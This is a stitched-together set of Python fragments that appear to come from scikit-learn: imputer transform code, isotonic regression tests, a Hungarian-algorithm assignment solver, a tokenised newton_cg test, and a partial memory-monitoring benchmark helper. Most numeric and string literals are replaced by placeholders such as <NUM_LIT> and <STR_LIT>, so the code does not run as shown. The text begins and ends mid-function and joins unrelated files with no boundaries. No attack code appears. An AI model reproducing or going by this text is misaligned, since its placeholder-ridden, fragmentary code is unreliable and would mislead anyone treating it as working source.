        if self.axis == <NUM_LIT:0>:
            # Transpose-then-reverse yields coordinates grouped by column,
            # matching the per-feature repetition of ``values``.
            coordinates = np.where(mask.transpose())[::-<NUM_LIT:1>]
        else:
            coordinates = mask

        X[coordinates] = values

        features_with_missing_values = np.where(np.any
                                                (mask, axis=<NUM_LIT:0>))[<NUM_LIT:0>]
        imputed_mask = mask[:, features_with_missing_values]
        if self.axis == <NUM_LIT:0>:
            self.imputed_features_ = valid_idx[features_with_missing_values]
        else:
            self.imputed_features_ = features_with_missing_values
        if self.add_indicator_features:
            X = np.hstack((X, imputed_mask))

        return X

    def transform(self, X):
        """Impute all missing values in X.

        For ``axis=0`` the statistics fitted in :meth:`fit` are used and
        features with no valid statistic are dropped (with a warning if
        ``verbose``).  For ``axis=1`` statistics are computed on X itself
        and a sample with no valid statistic raises ``ValueError``.
        """
        if self.axis == <NUM_LIT:0>:
            check_is_fitted(self, '<STR_LIT>')

        # axis=1 computes fresh per-sample statistics from this X.
        if self.axis == <NUM_LIT:1>:
            X = check_array(X, accept_sparse='<STR_LIT>', dtype=FLOAT_DTYPES,
                            force_all_finite=False, copy=self.copy)

            if sparse.issparse(X):
                statistics = self._sparse_fit(X,
                                              self.strategy,
                                              self.missing_values,
                                              self.axis)

            else:
                statistics = self._dense_fit(X,
                                             self.strategy,
                                             self.missing_values,
                                             self.axis)
        else:
            X = check_array(X, accept_sparse='<STR_LIT>', dtype=FLOAT_DTYPES,
                            force_all_finite=False, copy=self.copy)
            statistics = self.statistics_

        # NaN statistics mark rows/columns with no usable data.
        invalid_mask = np.isnan(statistics)
        valid_mask = np.logical_not(invalid_mask)
        valid_statistics = statistics[valid_mask]
        valid_idx = np.where(valid_mask)[<NUM_LIT:0>]
        # ``not axis`` flips 0<->1 to index the other dimension's length.
        missing = np.arange(X.shape[not self.axis])[invalid_mask]

        if self.axis == <NUM_LIT:0> and invalid_mask.any():
            if self.verbose:
                warnings.warn("<STR_LIT>"
                              "<STR_LIT>" % missing)
            # Drop features that cannot be imputed.
            X = X[:, valid_idx]
        elif self.axis == <NUM_LIT:1> and invalid_mask.any():
            raise ValueError("<STR_LIT>"
                             "<STR_LIT>" % missing)

        if sparse.issparse(X) and self.missing_values != <NUM_LIT:0>:
            X = self._sparse_transform(X, valid_statistics, valid_idx)
        else:
            # missing_values == 0 on sparse input: densify first, since
            # the zeros to impute are not stored.
            if sparse.issparse(X):
                X = X.toarray()
            X = self._dense_transform(X, valid_statistics, valid_idx)

        return X
import warnings

import numpy as np
import pickle
import copy

from sklearn.isotonic import (check_increasing, isotonic_regression,
                              IsotonicRegression)
from sklearn.utils.testing import (assert_raises, assert_array_equal,
                                   assert_true, assert_false, assert_equal,
                                   assert_array_almost_equal,
                                   assert_warns_message, assert_no_warnings)
from sklearn.utils import shuffle


def test_permutation_invariance():
    # Fitting on a shuffled copy of (x, y, sample_weight) must give the
    # same transform of the original x as fitting on the ordered data.
    ir = IsotonicRegression()
    x = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>, <NUM_LIT:7>]
    y = [<NUM_LIT:1>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:5>, <NUM_LIT>]
    sample_weight = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>, <NUM_LIT:7>]
    x_s, y_s, sample_weight_s = shuffle(x, y, sample_weight, random_state=<NUM_LIT:0>)
    y_transformed = ir.fit_transform(x, y, sample_weight=sample_weight)
    y_transformed_s = ir.fit(x_s, y_s, sample_weight=sample_weight_s).transform(x)

    assert_array_equal(y_transformed, y_transformed_s)


def test_check_increasing_up():
    # Monotonically increasing data -> True, no warning.
    x = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]
    y = [<NUM_LIT:0>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT:50>]

    # Check that we got increasing=True and no warnings
    is_increasing = assert_no_warnings(check_increasing, x, y)
    assert_true(is_increasing)


def test_check_increasing_up_extreme():
    # Strictly increasing identity-like data -> True, no warning.
    x = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]
    y = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]

    is_increasing = assert_no_warnings(check_increasing, x, y)
    assert_true(is_increasing)


def test_check_increasing_down():
    # Monotonically decreasing data -> False, no warning.
    x = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]
    y = [<NUM_LIT:0>, -<NUM_LIT>, -<NUM_LIT>, -<NUM_LIT>, -<NUM_LIT>, -<NUM_LIT:50>]

    is_increasing = assert_no_warnings(check_increasing, x, y)
    assert_false(is_increasing)


def test_check_increasing_down_extreme():
    # Strictly decreasing data -> False, no warning.
    x = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]
    y = [<NUM_LIT:0>, -<NUM_LIT:1>, -<NUM_LIT:2>, -<NUM_LIT:3>, -<NUM_LIT:4>, -<NUM_LIT:5>]

    is_increasing = assert_no_warnings(check_increasing, x, y)
    assert_false(is_increasing)


def test_check_ci_warn():
    # Ambiguous (alternating) data: expect a UserWarning and False.
    x = [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]
    y = [<NUM_LIT:0>, -<NUM_LIT:1>, <NUM_LIT:2>, -<NUM_LIT:3>, <NUM_LIT:4>, -<NUM_LIT:5>]

    is_increasing = assert_warns_message(UserWarning, "<STR_LIT>",
                                         check_increasing,
                                         x, y)

    assert_false(is_increasing)


def test_isotonic_regression():
    # Known PAVA solution plus API-consistency checks
    # (fit+transform == fit_transform == predict) and permutation
    # invariance of the inputs.
    y = np.array([<NUM_LIT:3>, <NUM_LIT:7>, <NUM_LIT:5>, <NUM_LIT:9>, <NUM_LIT:8>, <NUM_LIT:7>, <NUM_LIT:10>])
    y_ = np.array([<NUM_LIT:3>, <NUM_LIT:6>, <NUM_LIT:6>, <NUM_LIT:8>, <NUM_LIT:8>, <NUM_LIT:8>, <NUM_LIT:10>])
    assert_array_equal(y_, isotonic_regression(y))

    x = np.arange(len(y))
    ir = IsotonicRegression(y_min=<NUM_LIT:0.>, y_max=<NUM_LIT:1.>)
    ir.fit(x, y)
    assert_array_equal(ir.fit(x, y).transform(x), ir.fit_transform(x, y))
    assert_array_equal(ir.transform(x), ir.predict(x))

    # check that it is immune to permutation
    perm = np.random.permutation(len(y))
    ir = IsotonicRegression(y_min=<NUM_LIT:0.>, y_max=<NUM_LIT:1.>)
    assert_array_equal(ir.fit_transform(x[perm], y[perm]),
                       ir.fit_transform(x, y)[perm])
    assert_array_equal(ir.transform(x[perm]), ir.transform(x)[perm])

    # check we don't crash when all x are equal:
    ir = IsotonicRegression()
    assert_array_equal(ir.fit_transform(np.ones(len(x)), y), np.mean(y))


def test_isotonic_regression_ties_min():
    # Tied x values at the minimum get a common (averaged) fit.
    x = [<NUM_LIT:1>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>]
    y = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>]
    y_true = [<NUM_LIT>, <NUM_LIT>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>]

    ir = IsotonicRegression()
    ir.fit(x, y)
    assert_array_equal(ir.fit(x, y).transform(x), ir.fit_transform(x, y))
    assert_array_equal(y_true, ir.fit_transform(x, y))


def test_isotonic_regression_ties_max():
    # Tied x values at the maximum get a common (averaged) fit.
    x = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:5>]
    y = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>]
    y_true = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT>, <NUM_LIT>]

    ir = IsotonicRegression()
    ir.fit(x, y)
    assert_array_equal(ir.fit(x, y).transform(x), ir.fit_transform(x, y))
    assert_array_equal(y_true, ir.fit_transform(x, y))


def test_isotonic_regression_ties_secondary_():
    """Tied x blocks with differing y: check the secondary tie-break
    against a fixed reference solution (4-decimal tolerance)."""
    x = [<NUM_LIT:8>, <NUM_LIT:8>, <NUM_LIT:8>, <NUM_LIT:10>, <NUM_LIT:10>, <NUM_LIT:10>, <NUM_LIT:12>, <NUM_LIT:12>, <NUM_LIT:12>, <NUM_LIT>, <NUM_LIT>]
    y = [<NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>]
    y_true = [<NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>,
              <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>]

    ir = IsotonicRegression()
    ir.fit(x, y)
    assert_array_almost_equal(ir.transform(x), y_true, <NUM_LIT:4>)
    assert_array_almost_equal(ir.fit_transform(x, y), y_true, <NUM_LIT:4>)


def test_isotonic_regression_reversed():
    # increasing=False must produce a non-increasing sequence.
    y = np.array([<NUM_LIT:10>, <NUM_LIT:9>, <NUM_LIT:10>, <NUM_LIT:7>, <NUM_LIT:6>, <NUM_LIT>, <NUM_LIT:5>])
    y_ = IsotonicRegression(increasing=False).fit_transform(
        np.arange(len(y)), y)
    assert_array_equal(np.ones(y_[:-<NUM_LIT:1>].shape), ((y_[:-<NUM_LIT:1>] - y_[<NUM_LIT:1>:]) >= <NUM_LIT:0>))


def test_isotonic_regression_auto_decreasing():
    # increasing='auto' on decreasing data fits a decreasing function.
    y = np.array([<NUM_LIT:10>, <NUM_LIT:9>, <NUM_LIT:10>, <NUM_LIT:7>, <NUM_LIT:6>, <NUM_LIT>, <NUM_LIT:5>])
    x = np.arange(len(y))

    ir = IsotonicRegression(increasing='<STR_LIT>')
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("<STR_LIT>")
        y_ = ir.fit_transform(x, y)
        # Any warning raised must be of the tolerated kind only.
        assert_true(all(["<STR_LIT>"
                         in str(warn.message) for warn in w]))

    # Check that relationship decreases
    is_increasing = y_[<NUM_LIT:0>] < y_[-<NUM_LIT:1>]
    assert_false(is_increasing)


def test_isotonic_regression_auto_increasing():
    # increasing='auto' on increasing data fits an increasing function.
    y = np.array([<NUM_LIT:5>, <NUM_LIT>, <NUM_LIT:6>, <NUM_LIT:7>, <NUM_LIT:10>, <NUM_LIT:9>, <NUM_LIT:10>])
    x = np.arange(len(y))

    ir = IsotonicRegression(increasing='<STR_LIT>')
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("<STR_LIT>")
        y_ = ir.fit_transform(x, y)
        # Any warning raised must be of the tolerated kind only.
        assert_true(all(["<STR_LIT>"
                         in str(warn.message) for warn in w]))

    # Check that relationship increases
    is_increasing = y_[<NUM_LIT:0>] < y_[-<NUM_LIT:1>]
    assert_true(is_increasing)


def test_assert_raises_exceptions():
    # Invalid shapes / 2-D input / transform-before-fit all raise.
    ir = IsotonicRegression()
    rng = np.random.RandomState(<NUM_LIT>)
    assert_raises(ValueError, ir.fit, [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>], [<NUM_LIT:5>, <NUM_LIT:7>, <NUM_LIT:3>], [<NUM_LIT:0.1>, <NUM_LIT>])
    assert_raises(ValueError, ir.fit, [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>], [<NUM_LIT:5>, <NUM_LIT:7>])
    assert_raises(ValueError, ir.fit, rng.randn(<NUM_LIT:3>, <NUM_LIT:10>), [<NUM_LIT:0>, <NUM_LIT:1>, <NUM_LIT:2>])
    assert_raises(ValueError, ir.transform, rng.randn(<NUM_LIT:3>, <NUM_LIT:10>))


def test_isotonic_sample_weight_parameter_default_value():
    # Omitting sample_weight equals passing unit weights.
    ir = IsotonicRegression()
    rng = np.random.RandomState(<NUM_LIT>)
    n = <NUM_LIT:100>
    x = np.arange(n)
    y = rng.randint(-<NUM_LIT:50>, <NUM_LIT:50>, size=(n,)) + <NUM_LIT> * np.log(<NUM_LIT:1> + np.arange(n))
    # weights default to 1
    weights = np.ones(n)
    y_set_value = ir.fit_transform(x, y, sample_weight=weights)
    # no weights given
    y_default_value = ir.fit_transform(x, y)

    assert_array_equal(y_set_value, y_default_value)


def test_isotonic_min_max_boundaries():
    # The fit is clipped into [y_min, y_max].
    ir = IsotonicRegression(y_min=<NUM_LIT:2>, y_max=<NUM_LIT:4>)
    n = <NUM_LIT:6>
    x = np.arange(n)
    y = np.arange(n)
    y_test = [<NUM_LIT:2>, <NUM_LIT:2>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:4>]
    y_result = np.round(ir.fit_transform(x, y))
    assert_array_equal(y_result, y_test)


def test_isotonic_sample_weight():
    # Weighted fit matches the precomputed reference solution.
    ir = IsotonicRegression()
    x = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>, <NUM_LIT:7>]
    y = [<NUM_LIT:1>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:5>, <NUM_LIT>]
    sample_weight = [<NUM_LIT:1>, <NUM_LIT:2>, <NUM_LIT:3>, <NUM_LIT:4>, <NUM_LIT:5>, <NUM_LIT:6>, <NUM_LIT:7>]

    expected_y = [<NUM_LIT:1>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>, <NUM_LIT>]
    received_y = ir.fit_transform(x, y, sample_weight=sample_weight)

    assert_array_equal(expected_y, received_y)


def test_isotonic_regression_oob_raise():
    # out_of_bounds="raise": predicting outside the training range raises.
    y = np.array([<NUM_LIT:3>, <NUM_LIT:7>, <NUM_LIT:5>, <NUM_LIT:9>, <NUM_LIT:8>, <NUM_LIT:7>, <NUM_LIT:10>])
    x = np.arange(len(y))
    ir = IsotonicRegression(increasing='<STR_LIT>', out_of_bounds="<STR_LIT>")
    ir.fit(x, y)

    # Check that an exception is thrown
    assert_raises(ValueError, ir.predict, [min(x) - <NUM_LIT:10>, max(x) + <NUM_LIT:10>])


def test_isotonic_regression_oob_clip():
    # out_of_bounds="clip": out-of-range predictions stay within the
    # range of in-sample predictions.
    y = np.array([<NUM_LIT:3>, <NUM_LIT:7>, <NUM_LIT:5>, <NUM_LIT:9>, <NUM_LIT:8>, <NUM_LIT:7>, <NUM_LIT:10>])
    x = np.arange(len(y))
    ir = IsotonicRegression(increasing='<STR_LIT>', out_of_bounds="<STR_LIT>")
    ir.fit(x, y)

    # Predict from  training and test x and check that min/max match.
    y1 = ir.predict([min(x) - <NUM_LIT:10>, max(x) + <NUM_LIT:10>])
    y2 = ir.predict(x)
    assert_equal(max(y1), max(y2))
    assert_equal(min(y1), min(y2))


def test_isotonic_regression_oob_nan():
    # out_of_bounds="nan": out-of-range predictions come back as NaN.
    y = np.array([<NUM_LIT:3>, <NUM_LIT:7>, <NUM_LIT:5>, <NUM_LIT:9>, <NUM_LIT:8>, <NUM_LIT:7>, <NUM_LIT:10>])
    x = np.arange(len(y))
    ir = IsotonicRegression(increasing='<STR_LIT>', out_of_bounds="<STR_LIT>")
    ir.fit(x, y)

    # Predict from  training and test x and check that we have two NaNs.
    y1 = ir.predict([min(x) - <NUM_LIT:10>, max(x) + <NUM_LIT:10>])
    assert_equal(sum(np.isnan(y1)), <NUM_LIT:2>)


def test_isotonic_regression_oob_bad():
    # An invalid out_of_bounds value is rejected at fit time.
    y = np.array([<NUM_LIT:3>, <NUM_LIT:7>, <NUM_LIT:5>, <NUM_LIT:9>, <NUM_LIT:8>, <NUM_LIT:7>, <NUM_LIT:10>])
    x = np.arange(len(y))
    ir = IsotonicRegression(increasing='<STR_LIT>', out_of_bounds="<STR_LIT>")

    # Make sure that we throw an error for bad out_of_bounds value
    assert_raises(ValueError, ir.fit, x, y)


def test_isotonic_regression_oob_bad_after():
    # out_of_bounds mutated to an invalid value after fit is rejected
    # at transform time.
    y = np.array([<NUM_LIT:3>, <NUM_LIT:7>, <NUM_LIT:5>, <NUM_LIT:9>, <NUM_LIT:8>, <NUM_LIT:7>, <NUM_LIT:10>])
    x = np.arange(len(y))
    ir = IsotonicRegression(increasing='<STR_LIT>', out_of_bounds="<STR_LIT>")

    # Make sure that we throw an error for bad out_of_bounds value in transform
    ir.fit(x, y)
    ir.out_of_bounds = "<STR_LIT>"
    assert_raises(ValueError, ir.transform, x)


def test_isotonic_regression_pickle():
    # A pickled-and-restored model predicts identically.
    y = np.array([<NUM_LIT:3>, <NUM_LIT:7>, <NUM_LIT:5>, <NUM_LIT:9>, <NUM_LIT:8>, <NUM_LIT:7>, <NUM_LIT:10>])
    x = np.arange(len(y))

    # Create model and fit
    ir = IsotonicRegression(increasing='<STR_LIT>', out_of_bounds="<STR_LIT>")
    ir.fit(x, y)

    ir_ser = pickle.dumps(ir, pickle.HIGHEST_PROTOCOL)
    ir2 = pickle.loads(ir_ser)
    np.testing.assert_array_equal(ir.predict(x), ir2.predict(x))


def test_isotonic_duplicate_min_entry():
    # Duplicate x at the minimum must not yield non-finite predictions.
    x = [<NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:1>]
    y = [<NUM_LIT:0>, <NUM_LIT:0>, <NUM_LIT:1>]

    ir = IsotonicRegression(increasing=True, out_of_bounds="<STR_LIT>")
    ir.fit(x, y)
    all_predictions_finite = np.all(np.isfinite(ir.predict(x)))
    assert_true(all_predictions_finite)


def test_isotonic_zero_weight_loop():
    # Regression test: zero sample weights must not cause an infinite
    # loop; a second fit on the same data must also complete.
    rng = np.random.RandomState(<NUM_LIT>)

    # Create regression and samples
    regression = IsotonicRegression()
    n_samples = <NUM_LIT:50>
    x = np.linspace(-<NUM_LIT:3>, <NUM_LIT:3>, n_samples)
    y = x + rng.uniform(size=n_samples)

    # Get some random weights and zero out
    w = rng.uniform(size=n_samples)
    w[<NUM_LIT:5>:<NUM_LIT:8>] = <NUM_LIT:0>
    regression.fit(x, y, sample_weight=w)

    # This will hang in failure case.
    regression.fit(x, y, sample_weight=w)


def test_fast_predict():
    # The interpolation built on trimmed (deduplicated) thresholds via
    # fit() must predict exactly like one built on the full data via
    # the private _build_y/_build_f path.
    rng = np.random.RandomState(<NUM_LIT>)
    n_samples = <NUM_LIT:10> ** <NUM_LIT:3>
    # X values over the -10..10 range
    X_train = <NUM_LIT> * rng.rand(n_samples) - <NUM_LIT:10>

    # Initialise scores via a sigmoid-shaped Bernoulli draw.
    y_train = np.less(
        rng.rand(n_samples),
        <NUM_LIT:1.0> / (<NUM_LIT:1.0> + np.exp(-X_train))
    ).astype('<STR_LIT>')

    weights = rng.rand(n_samples)
    # we also want to test that everything still works when some weights are 0
    weights[rng.rand(n_samples) < <NUM_LIT:0.1>] = <NUM_LIT:0>

    slow_model = IsotonicRegression(y_min=<NUM_LIT:0>, y_max=<NUM_LIT:1>, out_of_bounds="<STR_LIT>")
    fast_model = IsotonicRegression(y_min=<NUM_LIT:0>, y_max=<NUM_LIT:1>, out_of_bounds="<STR_LIT>")

    # Build interpolation function with ALL input data, not trimmed
    X_train_fit, y_train_fit = slow_model._build_y(X_train, y_train,
                                                   sample_weight=weights,
                                                   trim_duplicates=False)
    slow_model._build_f(X_train_fit, y_train_fit)

    # fit with just the middle points
    fast_model.fit(X_train, y_train, sample_weight=weights)

    # Check that the faster algorithm gives the same predictions.
    X_test = <NUM_LIT> * rng.rand(n_samples) - <NUM_LIT:10>
    y_pred_slow = slow_model.predict(X_test)
    y_pred_fast = fast_model.predict(X_test)

    assert_array_equal(y_pred_slow, y_pred_fast)


def test_isotonic_copy_before_fit():
    # copy.copy on an unfitted estimator must not raise.
    ir = IsotonicRegression()
    copy.copy(ir)
"""Solve the minimum-cost linear assignment problem with the
Hungarian (Munkres) algorithm, implemented as a small state machine:
each ``_stepN`` function mutates the shared state and returns the next
step function to run (or None when finished).
"""
import numpy as np

from .fixes import astype


def linear_assignment(X):
    """Solve the linear assignment problem for cost matrix X.

    Returns an (n, 2) array of (row, column) index pairs of the optimal
    assignment, sorted by row index.
    """
    indices = _hungarian(X).tolist()
    indices.sort()
    # Re-force the shape so an empty result is still a (0, 2) array.
    indices = np.array(indices, dtype=int)
    indices.shape = (-<NUM_LIT:1>, <NUM_LIT:2>)
    return indices


class _HungarianState(object):
    """Mutable state shared by the Hungarian algorithm steps.

    ``marked`` holds 0 (plain), 1 (starred zero — a tentative
    assignment) or 2 (primed zero).  ``row_uncovered``/``col_uncovered``
    track the cover lines; ``path`` and ``Z0_r``/``Z0_c`` support the
    augmenting-path construction of step 5.
    """

    def __init__(self, cost_matrix):
        cost_matrix = np.atleast_2d(cost_matrix)

        # The algorithm assumes at least as many columns as rows; work
        # on the transpose otherwise and swap results back at the end.
        transposed = (cost_matrix.shape[<NUM_LIT:1>] < cost_matrix.shape[<NUM_LIT:0>])
        if transposed:
            self.C = (cost_matrix.T).copy()
        else:
            self.C = cost_matrix.copy()
        self.transposed = transposed

        n, m = self.C.shape
        self.row_uncovered = np.ones(n, dtype=np.bool)
        self.col_uncovered = np.ones(m, dtype=np.bool)
        self.Z0_r = <NUM_LIT:0>
        self.Z0_c = <NUM_LIT:0>
        self.path = np.zeros((n + m, <NUM_LIT:2>), dtype=int)
        self.marked = np.zeros((n, m), dtype=int)

    def _find_prime_in_row(self, row):
        """Return the column of the first primed (2) zero in ``row``,
        or -1 if the row contains no primed zero."""
        col = np.argmax(self.marked[row] == <NUM_LIT:2>)
        # argmax returns 0 on an all-False row; verify the hit is real.
        if self.marked[row, col] != <NUM_LIT:2>:
            col = -<NUM_LIT:1>
        return col

    def _clear_covers(self):
        """Mark every row and column as uncovered."""
        self.row_uncovered[:] = True
        self.col_uncovered[:] = True


def _hungarian(cost_matrix):
    """Run the step machine to completion and return the assignment as
    an array of (row, column) pairs (in original orientation)."""
    state = _HungarianState(cost_matrix)

    # A degenerate (empty) matrix is already solved.
    step = None if <NUM_LIT:0> in cost_matrix.shape else _step1

    while step is not None:
        step = step(state)

    # Starred zeros (== 1) are the final assignment.
    results = np.array(np.where(state.marked == <NUM_LIT:1>)).T

    # Undo the transposition done in __init__, if any.
    if state.transposed:
        results = results[:, ::-<NUM_LIT:1>]

    return results


def _step1(state):
    """Subtract each row's minimum, then star a zero in each row/column
    that has no starred zero yet.  Always proceeds to step 3."""
    state.C -= state.C.min(axis=<NUM_LIT:1>)[:, np.newaxis]
    for i, j in zip(*np.where(state.C == <NUM_LIT:0>)):
        if state.col_uncovered[j] and state.row_uncovered[i]:
            state.marked[i, j] = <NUM_LIT:1>
            state.col_uncovered[j] = False
            state.row_uncovered[i] = False

    state._clear_covers()
    return _step3


def _step3(state):
    """Cover every column containing a starred zero.  If all rows are
    assigned we are done (return None); otherwise go to step 4."""
    marked = (state.marked == <NUM_LIT:1>)
    state.col_uncovered[np.any(marked, axis=<NUM_LIT:0>)] = False

    if marked.sum() < state.C.shape[<NUM_LIT:0>]:
        return _step4


def _step4(state):
    """Prime uncovered zeros.  If the primed zero's row has no star,
    record it and go to step 5; otherwise cover the row, uncover the
    star's column and continue.  No uncovered zero left -> step 6."""
    # 0/1 matrix of zeros of C, masked to the uncovered rows/columns.
    C = (state.C == <NUM_LIT:0>).astype(np.int)
    covered_C = C * state.row_uncovered[:, np.newaxis]
    covered_C *= astype(state.col_uncovered, dtype=np.int, copy=False)
    n = state.C.shape[<NUM_LIT:0>]
    m = state.C.shape[<NUM_LIT:1>]
    while True:
        # Find an uncovered zero
        row, col = np.unravel_index(np.argmax(covered_C), (n, m))
        if covered_C[row, col] == <NUM_LIT:0>:
            return _step6
        else:
            state.marked[row, col] = <NUM_LIT:2>
            # Find the first starred element in the row
            star_col = np.argmax(state.marked[row] == <NUM_LIT:1>)
            if not state.marked[row, star_col] == <NUM_LIT:1>:
                # Could not find one
                state.Z0_r = row
                state.Z0_c = col
                return _step5
            else:
                col = star_col
                state.row_uncovered[row] = False
                state.col_uncovered[col] = True
                covered_C[:, col] = C[:, col] * (
                    astype(state.row_uncovered, dtype=np.int, copy=False))
                covered_C[row] = <NUM_LIT:0>


def _step5(state):
    """Build an alternating series of starred and primed zeros starting
    at the uncovered primed zero from step 4, then flip stars/primes
    along it (augmenting the assignment).  Go to step 3."""
    count = <NUM_LIT:0>
    path = state.path
    path[count, <NUM_LIT:0>] = state.Z0_r
    path[count, <NUM_LIT:1>] = state.Z0_c

    while True:
        # Find the first starred element in the col defined by the path.
        row = np.argmax(state.marked[:, path[count, <NUM_LIT:1>]] == <NUM_LIT:1>)
        if not state.marked[row, path[count, <NUM_LIT:1>]] == <NUM_LIT:1>:
            # Could not find one
            break
        else:
            count += <NUM_LIT:1>
            path[count, <NUM_LIT:0>] = row
            path[count, <NUM_LIT:1>] = path[count - <NUM_LIT:1>, <NUM_LIT:1>]

        # Find the first prime element in the row defined by the
        # first path step (same argmax-then-verify idiom as
        # _find_prime_in_row).
        col = np.argmax(state.marked[path[count, <NUM_LIT:0>]] == <NUM_LIT:2>)
        if state.marked[row, col] != <NUM_LIT:2>:
            col = -<NUM_LIT:1>
        count += <NUM_LIT:1>
        path[count, <NUM_LIT:0>] = path[count - <NUM_LIT:1>, <NUM_LIT:0>]
        path[count, <NUM_LIT:1>] = col

    # Convert paths: unstar each starred zero, star each primed zero.
    for i in range(count + <NUM_LIT:1>):
        if state.marked[path[i, <NUM_LIT:0>], path[i, <NUM_LIT:1>]] == <NUM_LIT:1>:
            state.marked[path[i, <NUM_LIT:0>], path[i, <NUM_LIT:1>]] = <NUM_LIT:0>
        else:
            state.marked[path[i, <NUM_LIT:0>], path[i, <NUM_LIT:1>]] = <NUM_LIT:1>

    state._clear_covers()
    # Erase all prime markings
    state.marked[state.marked == <NUM_LIT:2>] = <NUM_LIT:0>
    return _step3


def _step6(state):
    """Adjust the cost matrix: add the minimum uncovered value to each
    covered row and subtract it from each uncovered column, creating at
    least one new uncovered zero.  Return to step 4."""
    # the smallest uncovered value in the matrix
    if np.any(state.row_uncovered) and np.any(state.col_uncovered):
        minval = np.min(state.C[state.row_uncovered], axis=<NUM_LIT:0>)
        minval = np.min(minval[state.col_uncovered])
        state.C[np.logical_not(state.row_uncovered)] += minval
        state.C[:, state.col_uncovered] -= minval
    return _step4
<s> import numpy as np <EOL> from sklearn . utils . optimize import newton_cg <EOL> from scipy . optimize import fmin_ncg <EOL> from sklearn . utils . testing import assert_array_almost_equal <EOL> def test_newton_cg ( ) : <EOL> rng = np . random . RandomState ( <NUM_LIT:0> ) <EOL> A = rng . normal ( size = ( <NUM_LIT:10> , <NUM_LIT:10> ) ) <EOL> x0 = np . ones ( <NUM_LIT:10> ) <EOL> def func ( x ) : <EOL> Ax = A . dot ( x ) <EOL> return <NUM_LIT> * ( Ax ) . dot ( Ax ) <EOL> def grad ( x ) : <EOL> return A . T . dot ( A . dot ( x ) ) <EOL> def hess ( x , p ) : <EOL> return p . dot ( A . T . dot ( A . dot ( x . all ( ) ) ) ) <EOL> def grad_hess ( x ) : <EOL> return grad ( x ) , lambda x : A . T . dot ( A . dot ( x ) ) <EOL> assert_array_almost_equal ( <EOL> newton_cg ( grad_hess , func , grad , x0 , tol = <NUM_LIT> ) [ <NUM_LIT:0> ] , <EOL> fmin_ncg ( f = func , x0 = x0 , fprime = grad , fhess_p = hess ) <EOL> ) </s>
"""Shared helpers for the benchmark suite: subprocess memory
monitoring, system memory queries and address-space limiting.
Linux-only (relies on /proc)."""
from __future__ import division, absolute_import, print_function

import sys
import re
import time
import textwrap
import subprocess


class Benchmark(object):
    """Base class for benchmarks."""
    # Target runtime per benchmark repeat (asv-style attribute).
    goal_time = <NUM_LIT>


def run_monitored(code):
    """Run ``code`` (a Python source string) in a subprocess and sample
    its memory usage from /proc while it runs.

    Returns ``(duration, peak_memusage)``; the peak stays -1 if no
    sample was obtained.  Raises RuntimeError off Linux and
    AssertionError if the subprocess exits non-zero.
    """
    if not sys.platform.startswith('<STR_LIT>'):
        raise RuntimeError("<STR_LIT>")

    code = textwrap.dedent(code)
    process = subprocess.Popen([sys.executable, '<STR_LIT:-c>', code])

    peak_memusage = -<NUM_LIT:1>
    start = time.time()
    while True:
        ret = process.poll()
        if ret is not None:
            break
        # Sample the per-pid /proc file and extract a memory figure via
        # regex (presumably a VmHWM/VmPeak line in kB scaled to bytes —
        # the exact pattern is redacted; TODO confirm).
        with open('<STR_LIT>' % process.pid, '<STR_LIT:r>') as f:
            procdata = f.read()
        m = re.search('<STR_LIT>', procdata, re.S | re.I)
        if m is not None:
            memusage = float(m.group(<NUM_LIT:1>)) * <NUM_LIT>
            peak_memusage = max(memusage, peak_memusage)
        time.sleep(<NUM_LIT>)
    process.wait()

    duration = time.time() - start

